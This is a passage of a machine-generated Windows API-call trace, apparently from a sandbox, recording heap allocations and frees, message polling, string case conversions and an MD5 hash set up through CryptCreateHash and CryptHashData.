hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0200.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x24aa008, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0200.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.188] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0200.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.188] CryptCreateHash (in: hProv=0xad63f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0200.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0200.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.192] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.193] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.194] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0200.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.195] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.195] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.195] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.196] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.196] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.196] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.196] CryptHashData (hHash=0xaa58e0, pbData=0x24b1c28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0200.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.198] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.198] PeekMessageW (in: 